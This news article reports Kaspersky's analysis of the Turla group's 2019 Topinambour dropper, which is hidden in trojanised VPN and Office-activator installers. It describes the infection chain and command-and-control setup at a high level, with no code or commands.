The Turla APT has revamped its arsenal in 2019, creating new weapons and tools for targeting government entities. It’s now using booby-trapped anti-internet censorship software as an initial infection vector, suggesting Turla is going after dissident or other civil-society targets.
The Russian-speaking actors believed behind Turla named the dropper “Topinambour,” which is another word for the Jerusalem artichoke (a.k.a. the sunchoke). Since January, Topinambour has become the first-stage implantation for Turla campaigns. Once installed, it fetches all the other malware that the group uses to gain access to target networks and exfiltrate information.
“To deliver [the new modules] to targets, the operators use legitimate software installers infected with the Topinambour dropper,” researchers at Kaspersky wrote in a malware analysis on Monday. “These could be tools to circumvent internet censorship, such as Softether VPN 4.12 and psiphon3, or Microsoft Office activators.” The latter are exceptions to the anti-censorship ploys and are used by software pirates to activate the Microsoft Office suite without having to buy the actual product key.
The abuse of installation packs for VPN software, which can bypass internet censorship, suggests the attackers have clearly defined cyberespionage targets for these tools, the firm added.
Russian-speaking Turla (a.k.a. Snake, Venomous Bear, Waterbug and Uroboros) is known for spy campaigns targeting Western governments as well as embassies and consulates in post-Soviet states. It’s been active since at least 2014 (and possibly earlier) developing a range of custom backdoors to carry out its work. It continually evolves both in terms of malware and targets.
The Topinambour dropper contains what Kaspersky calls a “tiny .NET shell” that will wait for Windows shell commands from the command-and-control server (C2) and silently execute them. The C2 infrastructure is hosted on compromised WordPress sites and on cloud services.
“Using this and SMB shares on rented virtual private servers (VPS) [in South Africa], the campaign operators spread the next-stage modules using just ‘net use’ and ‘copy’ Windows shell commands,” the researchers noted.
The trojans upload, download and execute files, and fingerprint target systems. The PowerShell version of the trojan also has the ability to capture screenshots. They communicate with the C2 from an opened SMB share on a remote CELL-C VPS in South Africa.
And, they also retrieve a final-stage, more complex trojan, able to parse and execute custom commands from the C2, the researchers added. During the final stage of infection, this encrypted trojan for remote administration is embedded into the computer’s registry for the malware to access when complete.
Don’t miss our free live Threatpost webinar, “Streamlining Patch Management,” on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. Register and Learn More